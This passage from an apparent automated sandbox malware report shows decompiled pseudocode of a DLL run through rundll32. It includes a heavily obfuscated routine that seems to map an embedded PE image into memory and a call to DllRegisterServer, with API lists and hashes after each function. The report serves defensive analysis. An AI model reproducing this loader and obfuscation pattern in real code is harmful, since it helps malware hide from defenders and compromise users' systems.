                                                                                                            														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
                                                                                                            														_t604 =  *0x1004b0d8; // 0x0
                                                                                                            														_t756 =  *0x1004b0dc; // 0x0
                                                                                                            														_t448 =  *0x1004b0e0; // 0x0
                                                                                                            														_t890 =  *0x1004b0ec; // 0x0
                                                                                                            														_t891 =  *0x1004b0d8; // 0x0
                                                                                                            														_t279 = _t448 + 0x2e9; // 0x2e9
                                                                                                            														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
                                                                                                            														 *_t1066 = _t453;
                                                                                                            														_t759 =  *0x1004b0e4; // 0x0
                                                                                                            														_t1184 =  *0x1004b0e0; // 0x0
                                                                                                            														_t895 =  *0x1004b0e8; // 0x0
                                                                                                            														_t1187 =  *0x1004b0ec; // 0x0
                                                                                                            														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
                                                                                                            														_t900 =  *0x1004b0e8; // 0x0
                                                                                                            														_t454 =  *0x1004b0e4; // 0x0
                                                                                                            														_t761 =  *0x1004b0ec; // 0x0
                                                                                                            														_t624 =  *0x1004b0d8; // 0x0
                                                                                                            														_t293 = _t624 + 1; // 0x1
                                                                                                            														_t463 =  *0x1004b0e0; // 0x0
                                                                                                            														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
                                                                                                            														_push(_t951);
                                                                                                            														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
                                                                                                            														_push( *((intOrPtr*)(_t1251 + 0x84)));
                                                                                                            														_t467 = E10002CA0();
                                                                                                            														_t1251 = _t1251 + 0x30;
                                                                                                            														if(_t467 == 0) {
                                                                                                            															goto L31;
                                                                                                            														} else {
                                                                                                            															_t468 =  *0x1004b0e8; // 0x0
                                                                                                            															_t765 =  *0x1004b0d8; // 0x0
                                                                                                            															_t1200 =  *0x1004b0dc; // 0x0
                                                                                                            															_t903 =  *0x1004b0e4; // 0x0
                                                                                                            															_t905 =  *0x1004b0ec; // 0x0
                                                                                                            															_t1202 = _t765 - _t905 + _t905;
                                                                                                            															_t907 =  *0x1004b0dc; // 0x0
                                                                                                            															_t299 = _t1202 - 2; // -2
                                                                                                            															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
                                                                                                            															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
                                                                                                            															if(_t636 == 0) {
                                                                                                            																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
                                                                                                            															} else {
                                                                                                            																_t963 =  *0x1004b0e0; // 0x0
                                                                                                            																_t1227 =  *0x1004b0e4; // 0x0
                                                                                                            																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
                                                                                                            																_t970 =  *0x1004b0e0; // 0x0
                                                                                                            																_t971 =  *0x1004b0e4; // 0x0
                                                                                                            																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
                                                                                                            																_t492 = E10003B80();
                                                                                                            																_t924 =  *0x1004b0e0; // 0x0
                                                                                                            																_t1251 = _t1251 + 8;
                                                                                                            																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
                                                                                                            															}
                                                                                                            															_t469 =  *0x1004b0e4; // 0x0
                                                                                                            															_t766 =  *0x1004b0e0; // 0x0
                                                                                                            															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
                                                                                                            															_t473 = E10003F40();
                                                                                                            															_t1251 = _t1251 + 4;
                                                                                                            															if(_t473 == 0) {
                                                                                                            																goto L31;
                                                                                                            															} else {
                                                                                                            																_t474 =  *0x1004b0e8; // 0x0
                                                                                                            																_t770 =  *0x1004b0dc; // 0x0
                                                                                                            																_t637 =  *0x1004b0e4; // 0x0
                                                                                                            																_t318 = _t474 * 2; // 0x1
                                                                                                            																_t954 =  *0x1004b0ec; // 0x0
                                                                                                            																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
                                                                                                            																_t475 = E10003570();
                                                                                                            																_t1251 = _t1251 + 4;
                                                                                                            																if(_t475 == 0) {
                                                                                                            																	goto L31;
                                                                                                            																} else {
                                                                                                            																	_t913 =  *0x1004b0e0; // 0x0
                                                                                                            																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
                                                                                                            																	_t476 = E10003AD0();
                                                                                                            																	_t1251 = _t1251 + 4;
                                                                                                            																	if(_t476 != 0) {
                                                                                                            																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
                                                                                                            																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
                                                                                                            																		if(_t478 == 0) {
                                                                                                            																			 *(_t1066 + 0x38) = 0;
                                                                                                            																			return _t1066;
                                                                                                            																		} else {
                                                                                                            																			if( *(_t1066 + 0x14) == 0) {
                                                                                                            																				_t481 =  *0x1004b0d8; // 0x0
                                                                                                            																				_t955 =  *0x1004b0e0; // 0x0
                                                                                                            																				_t918 =  *0x1004b0ec; // 0x0
                                                                                                            																				_t778 =  *0x1004b0e8; // 0x0
                                                                                                            																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
                                                                                                            																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                                                            																				return _t1066;
                                                                                                            																			} else {
                                                                                                            																				_t780 =  *0x1004b0ec; // 0x0
                                                                                                            																				_t921 =  *0x1004b0d8; // 0x0
                                                                                                            																				_t956 =  *0x1004b0e4; // 0x0
                                                                                                            																				_t642 =  *0x1004b0dc; // 0x0
                                                                                                            																				_t962 =  *0x1004b0e0; // 0x0
                                                                                                            																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                                                            																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
                                                                                                            																				return _t1066;
                                                                                                            																			}
                                                                                                            																		}
                                                                                                            																	} else {
                                                                                                            																		goto L31;
                                                                                                            																	}
                                                                                                            																}
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            												} else {
                                                                                                            													_t1067 =  *0x1004b0d8; // 0x0
                                                                                                            													_t928 =  *0x1004b0dc; // 0x0
                                                                                                            													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
                                                                                                            													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                                                            													return 0;
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t789 =  *0x1004b0e4; // 0x0
                                                                                                            												_t930 =  *0x1004b0dc; // 0x0
                                                                                                            												_t1075 =  *0x1004b0d8; // 0x0
                                                                                                            												_t1076 =  *0x1004b0ec; // 0x0
                                                                                                            												_t194 = _t1076 - 4; // -4
                                                                                                            												_t665 =  *0x1004b0e8; // 0x0
                                                                                                            												_t498 =  *0x1004b0e0; // 0x0
                                                                                                            												_t1084 =  *0x1004b0d8; // 0x0
                                                                                                            												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
                                                                                                            												_t200 = _t1084 + 2; // 0x2
                                                                                                            												_t1085 =  *0x1004b0ec; // 0x0
                                                                                                            												_t668 =  *0x1004b0d8; // 0x0
                                                                                                            												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
                                                                                                            												_t520 =  *0x1004b0e0; // 0x0
                                                                                                            												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
                                                                                                            												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                                                            												_t1250 = _t1250 + 0x14;
                                                                                                            												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
                                                                                                            												if(_t523 == 0) {
                                                                                                            													goto L32;
                                                                                                            												} else {
                                                                                                            													_t585 = _t523;
                                                                                                            													goto L21;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x10005da9
                                                                                                            0x10005dd5
                                                                                                            0x10005dd8
                                                                                                            0x10005dde
                                                                                                            0x10005de3
                                                                                                            0x10005dec
                                                                                                            0x10005e05
                                                                                                            0x10005e13
                                                                                                            0x10005e1e
                                                                                                            0x10005e30
                                                                                                            0x10005e4e
                                                                                                            0x10005e4f
                                                                                                            0x10005e50
                                                                                                            0x10005e55
                                                                                                            0x10005e5a
                                                                                                            0x00000000
                                                                                                            0x10005e60
                                                                                                            0x10005e60
                                                                                                            0x10005e65
                                                                                                            0x10005e6b
                                                                                                            0x10005e8c
                                                                                                            0x10005e96
                                                                                                            0x10005ea2
                                                                                                            0x10005ea4
                                                                                                            0x10005eaa
                                                                                                            0x10005eba
                                                                                                            0x10005ebd
                                                                                                            0x10005ec1
                                                                                                            0x10005f58
                                                                                                            0x10005ec7
                                                                                                            0x10005ec7
                                                                                                            0x10005ee6
                                                                                                            0x10005f04
                                                                                                            0x10005f05
                                                                                                            0x10005f10
                                                                                                            0x10005f38
                                                                                                            0x10005f39
                                                                                                            0x10005f3e
                                                                                                            0x10005f4e
                                                                                                            0x10005f53
                                                                                                            0x10005f53
                                                                                                            0x10005f5f
                                                                                                            0x10005f79
                                                                                                            0x10005f86
                                                                                                            0x10005f87
                                                                                                            0x10005f8c
                                                                                                            0x10005f91
                                                                                                            0x00000000
                                                                                                            0x10005f93
                                                                                                            0x10005f93
                                                                                                            0x10005f98
                                                                                                            0x10005f9e
                                                                                                            0x10005fa4
                                                                                                            0x10005fc1
                                                                                                            0x10005fd5
                                                                                                            0x10005fd6
                                                                                                            0x10005fdb
                                                                                                            0x10005fe0
                                                                                                            0x00000000
                                                                                                            0x10005fe2
                                                                                                            0x10005fe2
                                                                                                            0x10005ffb
                                                                                                            0x10005ffc
                                                                                                            0x10006001
                                                                                                            0x10006006
                                                                                                            0x1000601d
                                                                                                            0x10006022
                                                                                                            0x10006026
                                                                                                            0x1000610e
                                                                                                            0x1000611d
                                                                                                            0x1000602c
                                                                                                            0x10006031
                                                                                                            0x100060a5
                                                                                                            0x100060aa
                                                                                                            0x100060b0
                                                                                                            0x100060c4
                                                                                                            0x100060d4
                                                                                                            0x10006101
                                                                                                            0x1000610c
                                                                                                            0x10006033
                                                                                                            0x10006033
                                                                                                            0x10006039
                                                                                                            0x1000603f
                                                                                                            0x10006045
                                                                                                            0x1000606d
                                                                                                            0x1000608f
                                                                                                            0x10006095
                                                                                                            0x100060a4
                                                                                                            0x100060a4
                                                                                                            0x10006031
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10006006
                                                                                                            0x10005fe0
                                                                                                            0x10005f91
                                                                                                            0x10005e5a
                                                                                                            0x10005a9d
                                                                                                            0x10005aa1
                                                                                                            0x10005aa8
                                                                                                            0x10005acc
                                                                                                            0x10005ad7
                                                                                                            0x10005ae7
                                                                                                            0x10005ae7
                                                                                                            0x1000591a
                                                                                                            0x1000591a
                                                                                                            0x10005920
                                                                                                            0x1000592b
                                                                                                            0x10005936
                                                                                                            0x10005943
                                                                                                            0x10005947
                                                                                                            0x10005957
                                                                                                            0x10005981
                                                                                                            0x10005989
                                                                                                            0x1000598d
                                                                                                            0x100059a0
                                                                                                            0x100059ae
                                                                                                            0x100059cb
                                                                                                            0x100059d2
                                                                                                            0x100059e7
                                                                                                            0x100059f1
                                                                                                            0x100059f3
                                                                                                            0x100059f8
                                                                                                            0x100059fc
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x10005a02
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x100059fc
                                                                                                            0x10005914
                                                                                                            0x10005803
                                                                                                            0x10005505
                                                                                                            0x100054cb
                                                                                                            0x10005488
                                                                                                            0x10005409
                                                                                                            0x10005361

                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 100056FB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                                                            • memcpy.MSVCRT ref: 10005CEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1755227880-0
                                                                                                            • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                                                            • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100350EA(intOrPtr __ecx, void* __eflags) {
                                                                                                            				void* _t37;
                                                                                                            				intOrPtr _t54;
                                                                                                            				void* _t56;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a421, _t56);
                                                                                                            				_push(__ecx);
                                                                                                            				_t54 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
                                                                                                            				E10035766(__ecx, __eflags); // executed
                                                                                                            				 *((intOrPtr*)(_t56 - 4)) = 0;
                                                                                                            				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
                                                                                                            				if( *((intOrPtr*)(_t56 + 8)) == 0) {
                                                                                                            					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                                                                                            				} else {
                                                                                                            					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
                                                                                                            				}
                                                                                                            				_t37 = E100373B5();
                                                                                                            				_t44 = _t37;
                                                                                                            				_push(0x10035062);
                                                                                                            				_t7 = _t44 + 0x1070; // 0x1070
                                                                                                            				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
                                                                                                            				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
                                                                                                            				 *((intOrPtr*)(_t37 + 4)) = _t54;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x40)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x78)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x60)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x64)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x50)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x84)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x54)) = 0;
                                                                                                            				 *((short*)(_t54 + 0x8e)) = 0;
                                                                                                            				 *((short*)(_t54 + 0x8c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x44)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x88)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x80)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x70)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x90)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x98)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x58)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x68)) = 0;
                                                                                                            				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
                                                                                                            				return _t54;
                                                                                                            			}






                                                                                                            0x100351a2
                                                                                                            0x100351a5
                                                                                                            0x100351a9
                                                                                                            0x100351b7
                                                                                                            0x100351bf

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100350EF
                                                                                                              • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                                                            • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                                                              • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentH_prologThread$_strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1650857145-0
                                                                                                            • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                                                            • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                                                            • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 226 10005090-10005097 227 100050a0-100050ab call 10004780 226->227 228 10005099-1000509a ExitProcess 226->228 231 100050b0-100050b2 227->231
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10005090() {
                                                                                                            				int _t1;
                                                                                                            
                                                                                                            				_t1 =  *0x1004d408; // 0x30efcc0
                                                                                                            				if(_t1 == 0) {
                                                                                                            					ExitProcess(_t1);
                                                                                                            				}
                                                                                                            				_push("DllRegisterServer");
                                                                                                            				_push(_t1);
                                                                                                            				 *((intOrPtr*)(E10004780()))(); // executed
                                                                                                            				return 0;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID: DllRegisterServer
                                                                                                            • API String ID: 621844428-1663957109
                                                                                                            • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                                                            • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                                                            • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 232 1001382a-10013842 call 10012514 235 10013845-1001384d 232->235 236 10013844 232->236 237 100138b4-100138b6 235->237 238 1001384f-10013856 235->238 236->235 239 100138b8-100138be 237->239 240 100138dd 237->240 241 10013858-1001386a 238->241 242 1001389f-100138a1 238->242 239->240 245 100138c0-100138c9 call 10014676 239->245 243 100138df-100138e4 call 1001254f 240->243 241->242 246 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 241->246 242->240 244 100138a3-100138b2 RtlAllocateHeap 242->244 244->237 245->235 254 100138cf 245->254 246->244 258 10013891-1001389c call 10011c50 246->258 254->243 258->242
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				void* _t17;
                                                                                                            				long _t23;
                                                                                                            				long _t31;
                                                                                                            				void* _t33;
                                                                                                            				void* _t34;
                                                                                                            				void* _t40;
                                                                                                            
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x10041e40);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
                                                                                                            				 *(_t33 - 0x20) = _t31;
                                                                                                            				if(_t31 == 0) {
                                                                                                            					_t31 = _t31 + 1;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					_t28 = 0;
                                                                                                            					 *(_t33 - 0x1c) = 0;
                                                                                                            					if(_t31 > 0xffffffe0) {
                                                                                                            						L9:
                                                                                                            						if(_t28 != 0 ||  *0x1004f58c == _t28) {
                                                                                                            							L13:
                                                                                                            							_t15 = _t28;
                                                                                                            							L14:
                                                                                                            							return E1001254F(_t15);
                                                                                                            						} else {
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if( *0x10050a64 != 3) {
                                                                                                            						L7:
                                                                                                            						if(_t28 != 0) {
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						L8:
                                                                                                            						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
                                                                                                            						_t28 = _t17;
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					_t31 = _t31 + 0x0000000f & 0xfffffff0;
                                                                                                            					 *(_t33 + 0xc) = _t31;
                                                                                                            					_t23 =  *(_t33 - 0x20);
                                                                                                            					_t40 = _t23 -  *0x10050a50; // 0x0
                                                                                                            					if(_t40 > 0) {
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					E10013A38(_t23, 0, 4);
                                                                                                            					 *(_t33 - 4) =  *(_t33 - 4) & 0;
                                                                                                            					_push(_t23);
                                                                                                            					 *(_t33 - 0x1c) = E1001437A();
                                                                                                            					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                                                                                                            					E100138D4();
                                                                                                            					_t28 =  *(_t33 - 0x1c);
                                                                                                            					if(_t28 == 0) {
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					E10011C50(_t28, 0,  *(_t33 - 0x20));
                                                                                                            					_t34 = _t34 + 0xc;
                                                                                                            					goto L7;
                                                                                                            					L11:
                                                                                                            				} while (E10014676(_t31) != 0);
                                                                                                            				goto L14;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 1001386E
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 4078605025-0
                                                                                                            • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                                                            • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 100107c8-100107d9 call 10012514 264 10010833-10010838 call 1001254f 261->264 265 100107db-100107e2 261->265 267 10010824 265->267 268 100107e4-100107fc call 10013a38 call 10013b9b 265->268 269 10010825-1001082d RtlFreeHeap 267->269 275 10010807-10010814 call 1001081b 268->275 276 100107fe-10010806 call 10013bc6 268->276 269->264 275->264 281 10010816-10010819 275->281 276->275 281->269
                                                                                                            C-Code - Quality: 18%
                                                                                                            			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				char _t9;
                                                                                                            				intOrPtr _t12;
